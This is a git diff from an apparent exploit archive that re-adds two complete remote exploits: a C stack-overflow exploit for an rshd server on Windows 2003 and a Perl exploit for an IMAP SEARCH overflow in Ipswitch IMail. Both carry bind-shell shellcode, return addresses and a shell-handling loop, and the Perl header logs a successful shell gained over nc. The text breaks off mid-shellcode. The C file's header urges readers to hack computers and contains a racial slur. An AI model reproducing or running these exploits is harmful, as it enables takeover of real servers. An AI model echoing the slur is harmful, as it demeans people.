-took about 35 minutes to find the bug and exploit it on Win2k3
-using the information provided to the public by WabiSabiLabi.
-
-Expect exploits for the rest of the auction items in the next week.
-Mayber sooner if Simon @ snosoft.com stops trying to cyber with me
-LOLOLOLOLOLOL niggerdongs.
-
-J
-*/
-
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-
-#define ESIZ 1 + 1 + 1 + 1 + 1 + 1028
-
-int
-main (int argc, char *argv[])
-{
-  unsigned char win32_bindshell[] =	// 9999 tcp
-    "AAAAAAAAAAAAA"
-    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66"
-    "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32"
-    "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32"
-    "\x4a\x7a\x4b\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75"
-    "\x30\x6e\x6b\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e"
-    "\x6b\x33\x4c\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56"
-    "\x78\x6e\x6b\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36"
-    "\x54\x4e\x6b\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d"
-    "\x54\x4b\x70\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f"
-    "\x32\x7a\x4b\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b"
-    "\x55\x4c\x4b\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46"
-    "\x6c\x30\x4b\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54"
-    "\x6c\x4c\x4b\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74"
-    "\x71\x4b\x6b\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36"
-    "\x6c\x4c\x4b\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31"
-    "\x4e\x42\x48\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49"
-    "\x46\x75\x36\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74"
-    "\x37\x54\x33\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38"
-    "\x4b\x38\x6d\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f"
-    "\x79\x4d\x35\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61"
-    "\x7a\x46\x62\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c"
-    "\x6d\x41\x47\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70"
-    "\x53\x51\x53\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62"
-    "\x48\x36\x47\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31"
-    "\x78\x6e\x44\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70"
-    "\x6a\x74\x50\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e"
-    "\x4d\x64\x6e\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39"
-    "\x6f\x58\x50\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39"
-    "\x6f\x79\x46\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a"
-    "\x33\x51\x78\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e"
-    "\x36\x51\x45\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72"
-    "\x48\x30\x63\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37"
-    "\x59\x58\x4c\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55"
-    "\x61\x4f\x30\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47"
-    "\x32\x34\x6c\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c"
-    "\x6b\x75\x38\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41"
-    "\x54\x59\x6f\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52"
-    "\x71\x51\x7a\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e"
-    "\x30\x50\x68\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a"
-    "\x76\x50\x6a\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32"
-    "\x77\x39\x6c\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79"
-    "\x6f\x6e\x30\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b"
-    "\x4f\x48\x56\x79\x6f\x4e\x30\x66";
-
-  char *buf;
-  int *ptr;
-  int i, c, sck;
-  struct sockaddr_in address;
-  struct hostent *hp;
-
-  if (argc < 2)
-    {
-      printf ("usage: %s address\n", argv[0]);
-      exit (-1);
-    }
-// lsd-pl arrayd.c
-  sck = socket (AF_INET, SOCK_STREAM, 0);
-  bzero (&address, sizeof (address));
-  address.sin_family = AF_INET;
-  address.sin_port = htons (514);
-  if (0 !=
-      bind (sck, (struct sockaddr *) &address, sizeof (struct sockaddr_in)))
-    {
-      perror ("bind");
-      exit (-344);
-    }
-  if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
-    {
-      if ((hp = gethostbyname (argv[1])) == NULL)
-	{
-	  errno = EADDRNOTAVAIL;
-	  perror ("error");
-	  exit (-1);
-	}
-      memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
-    }
-  if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0)
-    {
-      perror ("error");
-      exit (-1);
-    }
-  buf = malloc (ESIZ);
-  memcpy (buf, "\x00\x41\x00\x41\x00", 5);
-  memset (buf + 5, 0x41, 1028);
-  memcpy (buf + 5, win32_bindshell, sizeof (win32_bindshell) - 1);
-  ptr = (int *) (buf + 5 + 1024);
-  *ptr = 0x71ae36b7;		// call esi in wshtcpip in win2k3 SP1
-  write (sck, buf, ESIZ);
-  close (sck);
-  sleep (1);
-
-  sck = socket (AF_INET, SOCK_STREAM, 0);
-  bzero (&address, sizeof (address));
-  address.sin_family = AF_INET;
-  address.sin_port = htons (9999);
-  if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
-    {
-      if ((hp = gethostbyname (argv[1])) == NULL)
-	{
-	  errno = EADDRNOTAVAIL;
-	  perror ("error");
-	  exit (-1);
-	}
-      memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
-    }
-  if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0)
-    {
-      perror ("error");
-      exit (-1);
-    }
-  do_shell (sck);
-
-}
-
-// cvs_linux_freebsd_HEAP.c
-int
-do_shell (int sockfd)
-{
-  while (1)
-    {
-      fd_set fds;
-      FD_ZERO (&fds);
-      FD_SET (0, &fds);
-      FD_SET (sockfd, &fds);
-      if (select (FD_SETSIZE, &fds, NULL, NULL, NULL))
-	{
-	  int cnt;
-	  char buf[1024];
-	  if (FD_ISSET (0, &fds))
-	    {
-	      if ((cnt = read (0, buf, 1024)) < 1)
-		{
-		  if (errno == EWOULDBLOCK || errno == EAGAIN)
-		    continue;
-		  else
-		    break;
-		}
-	      write (sockfd, buf, cnt);
-	    }
-	  if (FD_ISSET (sockfd, &fds))
-	    {
-	      if ((cnt = read (sockfd, buf, 1024)) < 1)
-		{
-		  if (errno == EWOULDBLOCK || errno == EAGAIN)
-		    continue;
-		  else
-		    break;
-		}
-	      write (1, buf, cnt);
-	    }
-	}
-    }
-}
-
-// milw0rm.com [2007-07-24]
+/*
+Attached and in-line is an exploit for a newly announced item on
+the WabiSabiLabi auction block. I hope this completely devalues the
+item so that the original finder dies of starvation.
+
+DON'T SELL BUGS THROUGH WABISABILABLA
+
+USE EXPLOITS TO HACK COMPUTERS INSTEAD
+
+Exploit is for a stack overflow in http://rshd.sourceforge.net. It
+took about 35 minutes to find the bug and exploit it on Win2k3
+using the information provided to the public by WabiSabiLabi.
+
+Expect exploits for the rest of the auction items in the next week.
+Mayber sooner if Simon @ snosoft.com stops trying to cyber with me
+LOLOLOLOLOLOL niggerdongs.
+
+J
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#define ESIZ 1 + 1 + 1 + 1 + 1 + 1028
+
+int
+main (int argc, char *argv[])
+{
+  unsigned char win32_bindshell[] =	// 9999 tcp
+    "AAAAAAAAAAAAA"
+    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66"
+    "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32"
+    "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32"
+    "\x4a\x7a\x4b\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75"
+    "\x30\x6e\x6b\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e"
+    "\x6b\x33\x4c\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56"
+    "\x78\x6e\x6b\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36"
+    "\x54\x4e\x6b\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d"
+    "\x54\x4b\x70\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f"
+    "\x32\x7a\x4b\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b"
+    "\x55\x4c\x4b\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46"
+    "\x6c\x30\x4b\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54"
+    "\x6c\x4c\x4b\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74"
+    "\x71\x4b\x6b\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36"
+    "\x6c\x4c\x4b\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31"
+    "\x4e\x42\x48\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49"
+    "\x46\x75\x36\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74"
+    "\x37\x54\x33\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38"
+    "\x4b\x38\x6d\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f"
+    "\x79\x4d\x35\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61"
+    "\x7a\x46\x62\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c"
+    "\x6d\x41\x47\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70"
+    "\x53\x51\x53\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62"
+    "\x48\x36\x47\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31"
+    "\x78\x6e\x44\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70"
+    "\x6a\x74\x50\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e"
+    "\x4d\x64\x6e\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39"
+    "\x6f\x58\x50\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39"
+    "\x6f\x79\x46\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a"
+    "\x33\x51\x78\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e"
+    "\x36\x51\x45\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72"
+    "\x48\x30\x63\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37"
+    "\x59\x58\x4c\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55"
+    "\x61\x4f\x30\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47"
+    "\x32\x34\x6c\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c"
+    "\x6b\x75\x38\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41"
+    "\x54\x59\x6f\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52"
+    "\x71\x51\x7a\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e"
+    "\x30\x50\x68\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a"
+    "\x76\x50\x6a\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32"
+    "\x77\x39\x6c\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79"
+    "\x6f\x6e\x30\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b"
+    "\x4f\x48\x56\x79\x6f\x4e\x30\x66";
+
+  char *buf;
+  int *ptr;
+  int i, c, sck;
+  struct sockaddr_in address;
+  struct hostent *hp;
+
+  if (argc < 2)
+    {
+      printf ("usage: %s address\n", argv[0]);
+      exit (-1);
+    }
+// lsd-pl arrayd.c
+  sck = socket (AF_INET, SOCK_STREAM, 0);
+  bzero (&address, sizeof (address));
+  address.sin_family = AF_INET;
+  address.sin_port = htons (514);
+  if (0 !=
+      bind (sck, (struct sockaddr *) &address, sizeof (struct sockaddr_in)))
+    {
+      perror ("bind");
+      exit (-344);
+    }
+  if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
+    {
+      if ((hp = gethostbyname (argv[1])) == NULL)
+	{
+	  errno = EADDRNOTAVAIL;
+	  perror ("error");
+	  exit (-1);
+	}
+      memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
+    }
+  if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0)
+    {
+      perror ("error");
+      exit (-1);
+    }
+  buf = malloc (ESIZ);
+  memcpy (buf, "\x00\x41\x00\x41\x00", 5);
+  memset (buf + 5, 0x41, 1028);
+  memcpy (buf + 5, win32_bindshell, sizeof (win32_bindshell) - 1);
+  ptr = (int *) (buf + 5 + 1024);
+  *ptr = 0x71ae36b7;		// call esi in wshtcpip in win2k3 SP1
+  write (sck, buf, ESIZ);
+  close (sck);
+  sleep (1);
+
+  sck = socket (AF_INET, SOCK_STREAM, 0);
+  bzero (&address, sizeof (address));
+  address.sin_family = AF_INET;
+  address.sin_port = htons (9999);
+  if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
+    {
+      if ((hp = gethostbyname (argv[1])) == NULL)
+	{
+	  errno = EADDRNOTAVAIL;
+	  perror ("error");
+	  exit (-1);
+	}
+      memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
+    }
+  if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0)
+    {
+      perror ("error");
+      exit (-1);
+    }
+  do_shell (sck);
+
+}
+
+// cvs_linux_freebsd_HEAP.c
+int
+do_shell (int sockfd)
+{
+  while (1)
+    {
+      fd_set fds;
+      FD_ZERO (&fds);
+      FD_SET (0, &fds);
+      FD_SET (sockfd, &fds);
+      if (select (FD_SETSIZE, &fds, NULL, NULL, NULL))
+	{
+	  int cnt;
+	  char buf[1024];
+	  if (FD_ISSET (0, &fds))
+	    {
+	      if ((cnt = read (0, buf, 1024)) < 1)
+		{
+		  if (errno == EWOULDBLOCK || errno == EAGAIN)
+		    continue;
+		  else
+		    break;
+		}
+	      write (sockfd, buf, cnt);
+	    }
+	  if (FD_ISSET (sockfd, &fds))
+	    {
+	      if ((cnt = read (sockfd, buf, 1024)) < 1)
+		{
+		  if (errno == EWOULDBLOCK || errno == EAGAIN)
+		    continue;
+		  else
+		    break;
+		}
+	      write (1, buf, cnt);
+	    }
+	}
+    }
+}
+
+// milw0rm.com [2007-07-24]
diff --git a/platforms/windows/remote/4223.pl b/platforms/windows/remote/4223.pl
index fd05fa77b..b43fa728f 100755
--- a/platforms/windows/remote/4223.pl
+++ b/platforms/windows/remote/4223.pl
@@ -1,151 +1,151 @@
-#!/use/bin/perl
-#
-# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit
-# Author: ZhenHan.Liu#ph4nt0m.org
-# Date: 2007-07-25
-# Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)
-#
-# Vuln Found by: Manuel Santamarina Suarez
-# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563
-#
-# The Vuln code is here (imap4d32.exe version 6.8.8.1)
-#  00418CCA  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]
-#  00418CD0  |.  0FBE11        |MOVSX EDX,BYTE PTR DS:[ECX]
-#  00418CD3  |.  83FA 22       |CMP EDX,22
-#  00418CD6  |.  75 2A         |JNZ SHORT IMAP4D32.00418D02
-#  00418CD8  |.  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
-#  00418CDE  |.  50            |PUSH EAX                                ; /String
-#  00418CDF  |.  FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>>; \lstrlenA
-#  00418CE5  |.  83E8 02       |SUB EAX,2
-#  00418CE8  |.  50            |PUSH EAX                                ; /maxlen
-#  00418CE9  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]         ; |
-#  00418CEF  |.  83C1 01       |ADD ECX,1                               ; |
-#  00418CF2  |.  51            |PUSH ECX                                ; |src
-#  00418CF3  |.  8D55 AC       |LEA EDX,DWORD PTR SS:[EBP-54]           ; |
-#  00418CF6  |.  52            |PUSH EDX                                ; |dest
-#  00418CF7  |.  FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>]  ; \strncpy
-#  00418CFD  |.  83C4 0C       |ADD ESP,0C
-#  00418D00  |.  EB 13         |JMP SHORT IMAP4D32.00418D15
-#  00418D02  |>  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
-#  00418D08  |.  50            |PUSH EAX                                ; /src
-#  00418D09  |.  8D4D AC       |LEA ECX,DWORD PTR SS:[EBP-54]           ; |
-#  00418D0C  |.  51            |PUSH ECX                                ; |dest
-#  00418D0D  |.  E8 7E610100   |CALL               ; \strcpy
-#  00418D12  |.  83C4 08       |ADD ESP,8
-#  
-#  The programmer has made an extreamly stupid mistake.
-#  He checks the arg's first byte, if it is 0x22( " ),then invoke strcpy,
-#  else strncpy.
-#  the buffer overflow takes place when the strcpy is called.
-#  But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src)); 
-#  So, whether the command was started with a '"' or not, the stack overflow will take place immediately.  
-# 
-#  Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON".
-#  But others like "SEARCH BEFORE" command will also trigger the overflow.
-#
-#  NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!!
-#
-#  Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20
-#
-# Tested On Windows 2003 SP1 CN
-#
-#  D:\>perl imap.pl 192.168.226.128 143
-#  * OK IMAP4 Server (IMail 9.10)
-#  0 OK LOGIN completed
-#  * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
-#  * 1 EXISTS
-#  * 1 RECENT
-#  * OK [UIDVALIDITY 1185337300] UIDs valid
-#  * OK [UIDNEXT 485337302] Predicted next UID
-#  2 OK [READ-WRITE] SELECT completed
-#  -------------- [BEGIN] -------------------
-#  ----------------  [END]  ------------------
-#  
-#
-#  D:\>nc -vv -n 192.168.226.128 1154
-#  (UNKNOWN) [192.168.226.128] 1154 (?) open
-#  Microsoft Windows [°æ±¾ 5.2.3790]
-#  (C) °æȨËùÓÐ 1985-2003 Microsoft Corp.
-#  
-#  C:\WINDOWS\system32>
-#
-#
-
-
-use strict;
-use warnings;
-use IO::Socket;
-
-#Target IP
-my $host = shift ;
-my $port = shift ;
-my $account = "void";
-my $password = "ph4nt0m.org";
-
-my $pad1 = "void[at]ph4nt0m.org_" x 4 . "ph4nt0m";
-my $pad2 = 'void[at]pstgroup';
-my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 Universal
-
-# win32_bind -  EXITFUNC=thread LPORT=1154 Size=344 Encoder=Pex http://metasploit.com
-my $shellcode =
-"\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xb6".
-"\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x5e\x81\x07\x8a".
-"\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\xce\x79\x17\xfe".
-"\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x58\x49\x38\xec".
-"\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x8d\x2c\xdc\x5d".
-"\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\xe9\x64\xf9\x9e".
-"\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x3d\x3b\xc8\xfe".
-"\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\xf8\x76\x14\x25".
-"\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\xe9\x2c\x07\xa5".
-"\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x37\x95\xf0\x77".
-"\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x60\x2b\xab\x26".
-"\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\xd0\x2b\x71\x94".
-"\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\xe3\x87\x28\x1d".
-"\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x53\x31\x7e\x3c".
-"\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\xcf\xbe\x81\x22".
-"\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x3f\x9d\x92\x25".
-"\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x1c\x86\xba\x58".
-"\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x48\xcb\xee\x8a".
-"\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\xe7\x29\xad\x24".
-"\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x49\x4f\x07\xa5".
-"\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x59\xb6\x18\x15".
-"\xe5\x87\x2e\x8a\x66\x78\xf8\x75";
-
-
-my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>$port, proto=>"tcp" ) || die "Connect error.\n";
-
-my $res = <$sock>;
-print $res;
-if( $res !~ /OK/ )
-{
-	exit(-1);
-}
-
-# login
-print $sock "0 LOGIN $account $password\r\n";
-print $res = <$sock>;
-if( $res !~ /0 OK/ )
-{
-	exit(-1);
-}
-
-# select
-print $sock "1 SELECT INBOX\r\n";
-while(1)
-{
-	print $res = <$sock>;
-	if($res =~ /1 OK/)
-	{	last; }
-	elsif($res =~ /1 NO/ || $res =~ /BAD/)
-	{ 	exit(-1); }
-	else
-	{	next; }
-}
-
-# search
-my $payload = $pad1.$jmpesp.$pad2.$shellcode;
-print $sock "2 SEARCH ON <$payload>\r\n";
-
-$sock->close();
-
-# milw0rm.com [2007-07-25]
+#!/use/bin/perl
+#
+# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit
+# Author: ZhenHan.Liu#ph4nt0m.org
+# Date: 2007-07-25
+# Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)
+#
+# Vuln Found by: Manuel Santamarina Suarez
+# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563
+#
+# The Vuln code is here (imap4d32.exe version 6.8.8.1)
+#  00418CCA  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]
+#  00418CD0  |.  0FBE11        |MOVSX EDX,BYTE PTR DS:[ECX]
+#  00418CD3  |.  83FA 22       |CMP EDX,22
+#  00418CD6  |.  75 2A         |JNZ SHORT IMAP4D32.00418D02
+#  00418CD8  |.  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
+#  00418CDE  |.  50            |PUSH EAX                                ; /String
+#  00418CDF  |.  FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>>; \lstrlenA
+#  00418CE5  |.  83E8 02       |SUB EAX,2
+#  00418CE8  |.  50            |PUSH EAX                                ; /maxlen
+#  00418CE9  |.  8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]         ; |
+#  00418CEF  |.  83C1 01       |ADD ECX,1                               ; |
+#  00418CF2  |.  51            |PUSH ECX                                ; |src
+#  00418CF3  |.  8D55 AC       |LEA EDX,DWORD PTR SS:[EBP-54]           ; |
+#  00418CF6  |.  52            |PUSH EDX                                ; |dest
+#  00418CF7  |.  FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>]  ; \strncpy
+#  00418CFD  |.  83C4 0C       |ADD ESP,0C
+#  00418D00  |.  EB 13         |JMP SHORT IMAP4D32.00418D15
+#  00418D02  |>  8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
+#  00418D08  |.  50            |PUSH EAX                                ; /src
+#  00418D09  |.  8D4D AC       |LEA ECX,DWORD PTR SS:[EBP-54]           ; |
+#  00418D0C  |.  51            |PUSH ECX                                ; |dest
+#  00418D0D  |.  E8 7E610100   |CALL               ; \strcpy
+#  00418D12  |.  83C4 08       |ADD ESP,8
+#  
+#  The programmer has made an extreamly stupid mistake.
+#  He checks the arg's first byte, if it is 0x22( " ),then invoke strcpy,
+#  else strncpy.
+#  the buffer overflow takes place when the strcpy is called.
+#  But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src)); 
+#  So, whether the command was started with a '"' or not, the stack overflow will take place immediately.  
+# 
+#  Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON".
+#  But others like "SEARCH BEFORE" command will also trigger the overflow.
+#
+#  NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!!
+#
+#  Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20
+#
+# Tested On Windows 2003 SP1 CN
+#
+#  D:\>perl imap.pl 192.168.226.128 143
+#  * OK IMAP4 Server (IMail 9.10)
+#  0 OK LOGIN completed
+#  * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
+#  * 1 EXISTS
+#  * 1 RECENT
+#  * OK [UIDVALIDITY 1185337300] UIDs valid
+#  * OK [UIDNEXT 485337302] Predicted next UID
+#  2 OK [READ-WRITE] SELECT completed
+#  -------------- [BEGIN] -------------------
+#  ----------------  [END]  ------------------
+#  
+#
+#  D:\>nc -vv -n 192.168.226.128 1154
+#  (UNKNOWN) [192.168.226.128] 1154 (?) open
+#  Microsoft Windows [°æ±¾ 5.2.3790]
+#  (C) °æȨËùÓÐ 1985-2003 Microsoft Corp.
+#  
+#  C:\WINDOWS\system32>
+#
+#
+
+
+use strict;
+use warnings;
+use IO::Socket;
+
+#Target IP
+my $host = shift ;
+my $port = shift ;
+my $account = "void";
+my $password = "ph4nt0m.org";
+
+my $pad1 = "void[at]ph4nt0m.org_" x 4 . "ph4nt0m";
+my $pad2 = 'void[at]pstgroup';
+my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 Universal
+
+# win32_bind -  EXITFUNC=thread LPORT=1154 Size=344 Encoder=Pex http://metasploit.com
+my $shellcode =
+"\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xb6".
+"\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x5e\x81\x07\x8a".
+"\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\xce\x79\x17\xfe".
+"\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x58\x49\x38\xec".
